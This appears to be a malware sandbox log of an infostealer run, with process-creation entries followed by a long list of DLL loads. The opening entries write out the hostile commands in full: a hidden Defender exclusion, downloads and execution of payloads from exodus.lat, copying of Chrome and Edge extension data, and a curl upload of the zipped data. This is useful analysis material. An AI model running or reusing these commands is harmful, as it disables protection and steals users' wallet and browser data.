Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" "
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat"
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s https://api.ipify.org
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | Section loaded: apphelp.dll
                                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
